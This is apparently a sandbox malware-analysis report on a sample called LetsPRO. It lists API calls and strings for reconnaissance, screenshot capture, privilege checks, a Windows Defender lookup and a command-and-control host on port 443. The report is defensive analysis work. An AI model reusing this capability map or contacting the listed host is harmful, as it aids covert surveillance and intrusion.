__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13078 3f3a5fc GetHGlobalFromStream GlobalLock 13075->13078 13076 3f3a4e1 13079 3f31280 2 API calls 13076->13079 13077 3f3a4cd 13081 3f3f673 _malloc 20 API calls 13077->13081 13078->13054 13078->13055 13082 3f3a4ba 13079->13082 13080->13076 13080->13077 13080->13082 13081->13082 13083 3f3a519 GdipGetImageEncoders 13082->13083 13084 3f3a4f9 13082->13084 13086 3f3a52c 13083->13086 13083->13094 13085 3f3f639 _free 3 API calls 13084->13085 13084->13094 13085->13084 13087 3f3a5b4 GdipCreateBitmapFromHBITMAP 13086->13087 13088 3f3a56a 13086->13088 13086->13094 13090 3f3a594 GdipSaveImageToStream 13087->13090 13115 3f39a80 GdipCreateBitmapFromScan0 13088->13115 13092 3f3a59f GdipDisposeImage 13090->13092 13093 3f3a5dd GdipDisposeImage 13090->13093 13091 3f3a586 13091->13090 13092->13094 13093->13094 13094->13075 13099 3f3d02b 13095->13099 13096 3f3d08d 13100 3f3d09f 13096->13100 13116 3f392c0 13096->13116 13097 3f3ef39 std::_Xinvalid_argument 3 API calls 13097->13096 13099->13096 13099->13097 13101 3f3d051 13099->13101 13100->13060 13101->13060 13103 3f39bb2 DeleteObject 13102->13103 13104 3f39bd8 EnterCriticalSection 13102->13104 13103->13104 13105 3f39bf3 EnterCriticalSection 13104->13105 13106 3f39c17 LeaveCriticalSection 13104->13106 13107 3f39c03 GdiplusShutdown 13105->13107 13108 3f39c0a LeaveCriticalSection 13105->13108 13106->13045 13107->13108 13108->13106 13110 3f39ad0 13109->13110 13111 3f39ad7 EnterCriticalSection 13109->13111 13110->13065 13112 3f39b21 LeaveCriticalSection 13111->13112 13113 3f39af0 GdiplusStartup 13111->13113 13112->13065 13113->13112 13114 3f39b1f 13113->13114 13114->13112 13115->13091 13117 3f392fb 13116->13117 13118 3f39349 std::exception::exception 13117->13118 13119 3f3f707 31 API calls 13117->13119 13122 3f39344 moneypunct 13117->13122 13120 3f41215 __CxxThrowException@8 RaiseException 13118->13120 13121 3f3933d 13119->13121 13120->13122 
13121->13118 13121->13122 13122->13100 13123 25fe22f 13134 25f9e20 13123->13134 13125 25fe23b __getptd 13126 25fe26e 13125->13126 13127 25fe24c 13125->13127 13135 25fc238 13126->13135 13127->13126 13129 25fe252 __getptd 13127->13129 13133 25fe25a 13129->13133 13130 25fe275 __updatetlocinfoEx_nolock 13130->13133 13131 25fe25e __amsg_exit 13132 25fe266 ___DllMainCRTStartup 13131->13132 13133->13131 13133->13132 13134->13125 13136 25fc24d __mtinitlocknum 13135->13136 13137 25fc260 RtlEnterCriticalSection 13135->13137 13136->13137 13138 25fc258 __amsg_exit 13136->13138 13137->13130 13138->13137 13215 3f44b8e 13244 3f44300 13215->13244 13217 3f44b9a __getptd 13245 3f44885 13217->13245 13219 3f44bad 13259 3f44929 _LocaleUpdate::_LocaleUpdate 13219->13259 13222 3f44bc4 __malloc_crt 13223 3f44bd9 13222->13223 13241 3f44ced ___BuildCatchObject 13222->13241 13264 3f449a5 13223->13264 13226 3f44bfe InterlockedDecrement 13228 3f44c0e 13226->13228 13229 3f44c1f InterlockedIncrement 13226->13229 13227 3f44cfa 13231 3f3f639 _free 3 API calls 13227->13231 13235 3f44d0d 13227->13235 13227->13241 13228->13229 13233 3f3f639 _free 3 API calls 13228->13233 13230 3f44c35 13229->13230 13229->13241 13234 3f44c42 __lock 13230->13234 13230->13241 13231->13235 13232 3f3f91b __controlfp_s __getptd_noexit 13232->13241 13236 3f44c1e 13233->13236 13237 3f44c68 InterlockedDecrement 13234->13237 13235->13232 13236->13229 13239 3f44cc5 13237->13239 13240 3f44cd8 InterlockedIncrement 13237->13240 13239->13240 13242 3f3f639 _free 3 API calls 13239->13242 13240->13241 13243 3f44cd7 13242->13243 13243->13240 13244->13217 13276 3f44300 13245->13276 13247 3f44891 __getptd 13248 3f448a2 13247->13248 13249 3f448bf __lock 13247->13249 13248->13249 13250 3f448a8 __setmbcp 13248->13250 13249->13250 13251 3f448d9 13249->13251 13254 3f448af __amsg_exit 13250->13254 13256 3f448b7 ___BuildCatchObject 13250->13256 13252 3f448f7 InterlockedIncrement 13251->13252 13253 3f448dd InterlockedDecrement 13251->13253 

                                        Control-flow Graph

                                        [Figure: control-flow graph starting at 03F35430; legend: Executed, Not Executed]
                                        APIs
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3546C
                                        • _memset.LIBCMT ref: 03F35485
                                        • _memset.LIBCMT ref: 03F35495
                                        • gethostname.WS2_32(?,00000032), ref: 03F354A3
                                        • gethostbyname.WS2_32(?), ref: 03F354AD
                                        • inet_ntoa.WS2_32 ref: 03F354C5
                                        • _strcat_s.LIBCMT ref: 03F354D8
                                        • _strcat_s.LIBCMT ref: 03F354F1
                                        • inet_ntoa.WS2_32 ref: 03F3551A
                                        • _strcat_s.LIBCMT ref: 03F3552D
                                        • _strcat_s.LIBCMT ref: 03F35546
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35573
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35587
                                        • GetLastInputInfo.USER32(?), ref: 03F3559A
                                        • GetTickCount.KERNEL32 ref: 03F355A0
                                        • wsprintfW.USER32 ref: 03F355D5
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 03F355E8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 03F355FC
                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35653
                                        • wsprintfW.USER32 ref: 03F3566C
                                        • GetForegroundWindow.USER32 ref: 03F35695
                                        • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 03F356AC
                                        • lstrlenW.KERNEL32(000008CC), ref: 03F356D3
                                        • lstrlenW.KERNEL32(00000994), ref: 03F35739
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 03F357AA
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F357B1
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 03F357C2
                                        • GetSystemInfo.KERNEL32(?), ref: 03F357CD
                                        • wsprintfW.USER32 ref: 03F35806
                                        • GetCurrentProcessId.KERNEL32 ref: 03F35818
                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 03F3582E
                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104), ref: 03F3584B
                                        • CloseHandle.KERNEL32(03F55164), ref: 03F3587F
                                        • GetTickCount.KERNEL32 ref: 03F358E9
                                        • __time64.LIBCMT ref: 03F358F8
                                        • __localtime64.LIBCMT ref: 03F3592F
                                        • wsprintfW.USER32 ref: 03F35968
                                        • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 03F3597D
                                        • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 03F3598C
                                        • GetCurrentHwProfileW.ADVAPI32(?), ref: 03F35999
                                          • Part of subcall function 03F380F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A773E0,00000AD4,00000000), ref: 03F38132
                                          • Part of subcall function 03F380F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                          • Part of subcall function 03F380F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                          • Part of subcall function 03F380F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                          • Part of subcall function 03F380F0: lstrlenW.KERNEL32(?), ref: 03F381B7
                                          • Part of subcall function 03F380F0: __wcsnicmp.LIBCMT ref: 03F381CE
                                          • Part of subcall function 03F380F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                        • String ID: %d min$1.0$2024. 4.23$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                        • API String ID: 1101047656-2209637692
                                        • Opcode ID: 1948ce06f6f8ce57024a4bd86072b9bc2a7a239462088cb03614f5b9891fcbc4
                                        • Instruction ID: 77ae0f8f0051d5bf0e72ee8cf34f701bc0b6ae28d8e18c16180c87e99fc1842d
                                        • Opcode Fuzzy Hash: 1948ce06f6f8ce57024a4bd86072b9bc2a7a239462088cb03614f5b9891fcbc4
                                        • Instruction Fuzzy Hash: 1FF194B5940308AFD724EB64CC85FEBB7B8AF85700F004958F71EAB181EA70A645CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        [Figure: control-flow graph starting at 03F3DF10; legend: Executed, Not Executed]
                                        APIs
                                          • Part of subcall function 03F40542: __fassign.LIBCMT ref: 03F40538
                                        • Sleep.KERNEL32(00000000), ref: 03F3DF64
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3DF91
                                        • GetLocalTime.KERNEL32(?), ref: 03F3DFA9
                                        • wsprintfW.USER32 ref: 03F3DFE0
                                        • SetUnhandledExceptionFilter.KERNEL32(03F375B0), ref: 03F3DFEE
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3E007
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • EnumWindows.USER32(03F35CC0,?), ref: 03F3E19D
                                        • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03F3E1AA
                                        • EnumWindows.USER32(03F35CC0,?), ref: 03F3E1BE
                                        • Sleep.KERNEL32(00000BB8), ref: 03F3E1F5
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F3E241
                                        • Sleep.KERNEL32(00000FA0), ref: 03F3E2C4
                                        • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 03F3E2EB
                                        • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03F3E30B
                                        • CloseHandle.KERNEL32(?), ref: 03F3E35D
                                        • Sleep.KERNEL32(000003E8,?,?), ref: 03F3E3A4
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03F3E3D0
                                        • CloseHandle.KERNEL32(?,?,?), ref: 03F3E3D7
                                        • Sleep.KERNEL32(000003E8,?,?), ref: 03F3E3E2
                                        • CloseHandle.KERNEL32(?), ref: 03F3E400
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03F3E425
                                        • CloseHandle.KERNEL32(?,?,?), ref: 03F3E42C
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 03F3E446
                                        • CloseHandle.KERNEL32(?), ref: 03F3E464
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                        • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$156.248.54.11.webcamcn.xyz$156.248.54.11.webcamcn.xyz$156.248.54.11.webcamcn.xyz$443$Console$IpDatespecial
                                        • API String ID: 1511462596-2209267673
                                        • Opcode ID: de6b7ebba42d86ee91fab9f1e563f052c29f55d5c41d80dc556a81056b97006c
                                        • Instruction ID: 2419456da1f8fb26c9cee3dcefb9d64c550b456dd27a8766adbd22e2401ce19a
                                        • Opcode Fuzzy Hash: de6b7ebba42d86ee91fab9f1e563f052c29f55d5c41d80dc556a81056b97006c
                                        • Instruction Fuzzy Hash: 5AD107B5988305AFE320EF60DC85E6EBBA4FFD6B04F040A2CF66586284DB709505CB53
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GetDesktopWindow.USER32 ref: 03F3BC8F
                                        • GetDC.USER32(00000000), ref: 03F3BC9C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 03F3BCA2
                                        • GetDC.USER32(00000000), ref: 03F3BCAD
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 03F3BCBA
                                        • GetDeviceCaps.GDI32(00000000,00000076), ref: 03F3BCC2
                                        • ReleaseDC.USER32(00000000,00000000), ref: 03F3BCD3
                                        • GetSystemMetrics.USER32(0000004E), ref: 03F3BCF8
                                        • GetSystemMetrics.USER32(0000004F), ref: 03F3BD26
                                        • GetSystemMetrics.USER32(0000004C), ref: 03F3BD78
                                        • GetSystemMetrics.USER32(0000004D), ref: 03F3BD8D
                                        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03F3BDA6
                                        • SelectObject.GDI32(?,00000000), ref: 03F3BDB4
                                        • SetStretchBltMode.GDI32(?,00000003), ref: 03F3BDC0
                                        • GetSystemMetrics.USER32(0000004F), ref: 03F3BDCD
                                        • GetSystemMetrics.USER32(0000004E), ref: 03F3BDE0
                                        • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 03F3BE07
                                        • _memset.LIBCMT ref: 03F3BE7A
                                        • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 03F3BE97
                                        • _memset.LIBCMT ref: 03F3BEAF
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • DeleteObject.GDI32(?), ref: 03F3BF23
                                        • DeleteObject.GDI32(?), ref: 03F3BF2D
                                        • ReleaseDC.USER32(00000000,?), ref: 03F3BF39
                                        • DeleteObject.GDI32(?), ref: 03F3BFDF
                                        • DeleteObject.GDI32(?), ref: 03F3BFE9
                                        • ReleaseDC.USER32(00000000,?), ref: 03F3BFF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                        • String ID: ($6$gfff$gfff
                                        • API String ID: 3293817703-713438465
                                        • Opcode ID: b820ab7de4ba1768080346f12fb633d929745d5ef34f317deef4a2a4a617f3c3
                                        • Instruction ID: 6bd6968c4692ad3e54a3bcbca91b9dc1a3fd775aacf4d150d31537af1ee61af4
                                        • Opcode Fuzzy Hash: b820ab7de4ba1768080346f12fb633d929745d5ef34f317deef4a2a4a617f3c3
                                        • Instruction Fuzzy Hash: B1D169B5E01308AFDB14EFE9EC85A9EBBB9FF49300F144529F905AB250D770A905CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcessId.KERNEL32(75A773E0), ref: 03F36A94
                                        • wsprintfW.USER32 ref: 03F36AA7
                                          • Part of subcall function 03F36910: GetCurrentProcessId.KERNEL32(1A93E2E0,00000000,00000000,75A773E0,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36938
                                          • Part of subcall function 03F36910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36947
                                          • Part of subcall function 03F36910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36960
                                          • Part of subcall function 03F36910: CloseHandle.KERNEL32(00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F3696B
                                        • _memset.LIBCMT ref: 03F36AC2
                                        • GetVersionExW.KERNEL32(?), ref: 03F36ADB
                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 03F36B12
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 03F36B19
                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03F36B3F
                                        • GetLastError.KERNEL32 ref: 03F36B49
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 03F36B5D
                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03F36B85
                                        • GetSidSubAuthorityCount.ADVAPI32 ref: 03F36B98
                                        • GetSidSubAuthority.ADVAPI32(00000000), ref: 03F36BA6
                                        • LocalFree.KERNEL32(?), ref: 03F36BB5
                                        • CloseHandle.KERNEL32(?), ref: 03F36BC2
                                        • wsprintfW.USER32 ref: 03F36C1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                        • String ID: -N/$NO/$None/%s
                                        • API String ID: 3036438616-3095023699
                                        • Opcode ID: 831b57fd5e6fc478bd755c93e32380c5e8e101dcf1f5261105576cdc25afd39d
                                        • Instruction ID: 4cfa1fdd2b59562aa0a7ee18a6dab1f1a45d8ce737b0f6d6ab858beb6c66737a
                                        • Opcode Fuzzy Hash: 831b57fd5e6fc478bd755c93e32380c5e8e101dcf1f5261105576cdc25afd39d
                                        • Instruction Fuzzy Hash: 0641A071A00319BFDB20DB61DCD8FEA7B78EB0A711F044595FA0AD6245DA34D990CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        [Figure: control-flow graph starting at 03F36150; legend: Executed, Not Executed]
                                        APIs
                                        • _memset.LIBCMT ref: 03F3618B
                                        • lstrcatW.KERNEL32(03F61F10,03F5510C), ref: 03F361CD
                                        • lstrcatW.KERNEL32(03F61F10,03F5535C), ref: 03F361D9
                                        • CoCreateInstance.OLE32(03F52480,00000000,00000017,03F5578C,?,?,1A93E2E0,00000AD4,00000000,75A773E0), ref: 03F36220
                                        • _memset.LIBCMT ref: 03F362CE
                                        • wsprintfW.USER32 ref: 03F36336
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03F3635F
                                        • _memset.LIBCMT ref: 03F36376
                                          • Part of subcall function 03F36050: _memset.LIBCMT ref: 03F3607C
                                          • Part of subcall function 03F36050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F36088
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                        • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                        • API String ID: 1221949200-1583895642
                                        • Opcode ID: 7f78b4e8cb86dff3af61cb6dbb9f1a0b42771250f7a0f88967c51211f8ae9e81
                                        • Instruction ID: eddedacc5231bc6fbf33f5488c8aba5c443eb99f89e8725e46a68cab037ae289
                                        • Opcode Fuzzy Hash: 7f78b4e8cb86dff3af61cb6dbb9f1a0b42771250f7a0f88967c51211f8ae9e81
                                        • Instruction Fuzzy Hash: FA8173B1A00229AFDB20DB54CC91FAEB7B8EB49704F0445D8F719A7155D7B4AE80CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAlloc.KERNEL32(000040B9,ABACE041,00003000,00000004,?,?,?), ref: 00401654
                                        • LoadLibraryA.KERNEL32(?), ref: 004019C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocLibraryLoadVirtual
                                        • String ID: @2@$GetM$GetP$Load$RtlM$Virt$ddre$eNam$odul$ualA$ualF
                                        • API String ID: 3550616410-2332390775
                                        • Opcode ID: 284b01f6618e40d9474911e63141fe03f15bdc035b349e916aed1a27081ceff0
                                        • Instruction ID: 87e66fb729c98852f49bd30e70b2d89e39bb07d99bac907f207390802af119ca
                                        • Opcode Fuzzy Hash: 284b01f6618e40d9474911e63141fe03f15bdc035b349e916aed1a27081ceff0
                                        • Instruction Fuzzy Hash: C1327B716043419FCB24CF18C884A2AB7F1FF94314F15856EE499AB3A1D778E985CF8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryW.KERNEL32(ntdll.dll,75A773E0,?,?,?,03F35611,0000035E,000002FA), ref: 03F3749C
                                        • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 03F374B2
                                        • swprintf.LIBCMT ref: 03F374EF
                                          • Part of subcall function 03F37410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03F37523), ref: 03F3743D
                                          • Part of subcall function 03F37410: GetProcAddress.KERNEL32(00000000), ref: 03F37444
                                          • Part of subcall function 03F37410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F37452
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03F37547
                                        • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03F37563
                                        • RegCloseKey.ADVAPI32(000002FA), ref: 03F37586
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,03F35611,0000035E,000002FA), ref: 03F37598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                        • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                        • API String ID: 2158625971-3190923360
                                        • Opcode ID: d042e110840a5d282053e79d008fbf5aefc8b179646179c16aaab11a7223d078
                                        • Instruction ID: 3c449f6a290355449873eb1452abbd4aa4719aee25fb3513ab2c452938d22ce4
                                        • Opcode Fuzzy Hash: d042e110840a5d282053e79d008fbf5aefc8b179646179c16aaab11a7223d078
                                        • Instruction Fuzzy Hash: 7A31B4B6A41309BFDB18EBA4CD45FAFBB7CDF49740F140519BB0AA6145EA70DA04C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetDriveTypeW.KERNEL32(?,7591DF80,00000000,75A773E0), ref: 03F36C8B
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03F36CAA
                                        • _memset.LIBCMT ref: 03F36CE1
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 03F36CF4
                                        • swprintf.LIBCMT ref: 03F36D39
                                        • swprintf.LIBCMT ref: 03F36D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                        • String ID: %sFree%d Gb $:$@$HDD:%d
                                        • API String ID: 3202570353-3501811827
                                        • Opcode ID: e22cd2ef7cd78af0edf146e1fbf44b791f5732f3d3b6f0938ec97ba6494e1a7d
                                        • Instruction ID: 5050a3942366fce1d55dda43af2adae64ee5633bde3e4ccbf7437c06c54ed577
                                        • Opcode Fuzzy Hash: e22cd2ef7cd78af0edf146e1fbf44b791f5732f3d3b6f0938ec97ba6494e1a7d
                                        • Instruction Fuzzy Hash: 04315EB6E0030CABDB14DFE5CC55BEEB7B9FB49700F50421DEA1AA7241D6746905CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateDXGIFactory.DXGI(03F5579C,?,1A93E2E0,7591DF80,00000000,75A773E0), ref: 03F36F4A
                                        • swprintf.LIBCMT ref: 03F3711E
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F371C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                        • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                        • API String ID: 3803070356-257307503
                                        • Opcode ID: 4ec8e0a8782fa88534a7449d5173bd4eeae121f944e52ba11dd7768e7c1e7fbc
                                        • Instruction ID: a9c829b88efd530bec0cae52cc28a7dc2b9b07f4d3b9821c454ad1a70fff4b3a
                                        • Opcode Fuzzy Hash: 4ec8e0a8782fa88534a7449d5173bd4eeae121f944e52ba11dd7768e7c1e7fbc
                                        • Instruction Fuzzy Hash: F6E165B1E002259FDF24DE64CC80BEEB375EF46700F1446E9E959A7284D770AE858F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F3607C
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F36088
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 03F360B9
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 03F3610F
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03F36116
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                        • String ID:
                                        • API String ID: 2526126748-0
                                        • Opcode ID: 1210abfef54a925ab639dea135bd4422037d6da441185c233d2751c74b38d14d
                                        • Instruction ID: 9cd4e02d5b4a73dbc798e84776e78b76414a40f70e5f2ec5cb14f3743fc43255
                                        • Opcode Fuzzy Hash: 1210abfef54a925ab639dea135bd4422037d6da441185c233d2751c74b38d14d
                                        • Instruction Fuzzy Hash: 27210571A00219BBDB20FF74DC96BEAB3A8EF1A710F040699DD0AD7180EB319A05C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time_memmovetime
                                        • String ID:
                                        • API String ID: 1463837790-0
                                        • Opcode ID: a9c97c26700ec1fb38f1f682dead8b5b38b6e431afc51f242176c2cd91c66951
